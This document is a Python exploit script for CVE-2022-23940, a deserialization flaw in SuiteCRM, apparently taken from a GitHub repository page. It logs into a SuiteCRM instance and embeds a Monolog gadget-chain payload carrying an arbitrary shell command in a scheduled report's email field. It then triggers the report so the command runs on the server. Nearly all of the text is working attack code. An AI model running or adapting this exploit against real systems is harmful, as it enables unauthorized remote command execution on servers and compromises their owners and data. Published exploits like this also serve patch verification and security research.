README.md
Rendering markdown...
#!/usr/bin/env python3
import re
import click
import logging
import requests
from base64 import b64encode
# Credits to https://github.com/ambionics/phpggc (Monolog/RCE2 payload)
payload_template_start = b'a:2:{i:7;O:32:"Monolog\\Handler\\SyslogUdpHandler":1:{s:6:"socket";O:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"\x00*\x00handler";O:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"\x00*\x00handler";N;s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;'
payload_template_second = b';s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;'
payload_template_third = b';s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}i:7;i:7;}'
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("CVE-2022-23940")
@click.command("CVE-2022-23940",
epilog="https://github.com/manuelz120/CVE-2022-23940")
@click.option(
"--host",
'-h',
default="http://localhost",
help="Root of SuiteCRM installation. Defaults to http://localhost")
@click.option("--username", '-u', prompt="Username> ", help="Username")
@click.option("--password",
'-p',
prompt="Password> ",
help="password",
hide_input=True)
@click.option("--payload",
'-P',
help="Shell command to be executed on target system",
default='touch /tmp/flag.txt')
@click.option("--is_core",
'-d',
default=False,
help="SuiteCRM Core (>= 8.0.0). Defaults to False")
def main(host: str, username: str, password: str, payload: str, is_core: bool):
host = f"{host}/legacy" if is_core else host
session = requests.Session()
login_response = session.post(f'{host}/index.php',
data={
"module": "Users",
"action": "Authenticate",
"user_name": username,
"username_password": password,
})
if "&action=Login" in login_response.url:
logger.error(
"Login didn't work. Are you sure you specified the correct parameters?"
)
exit(-1)
logger.info(f"Login did work - Trying to create scheduled report")
command_payload = f"s:{len(payload)}:\"{payload}\"".encode()
payload = payload_template_start + command_payload + payload_template_second + command_payload + payload_template_third
payload = b64encode(payload)
response = session.post(f'{host}/index.php',
data={
"module": "AOR_Scheduled_Reports",
"action": "Save",
"name": "test",
"status": "active",
"schedule_type": "monthly",
"email_recipients": payload
},
headers={
'Referer': host,
"content-type":
"application/x-www-form-urlencoded"
})
record_id_regex = re.compile(r"record_id='([^[']+)'", re.MULTILINE)
record_id = record_id_regex.findall(response.text).pop()
if not record_id:
logger.error("Failed to create scheduled report")
exit(-1)
logger.info(
f"Succesfully created scheduled report with id {record_id}. Enjoy your command execution :)"
)
# Trigger the scheduled report
logger.info(f"Triggering the scheduled report...")
trigger_response = session.get(f'{host}/index.php?module=AOR_Scheduled_Reports&action=run&record={record_id}')
logger.info("Report triggered, check your listener")
if __name__ == "__main__":
main()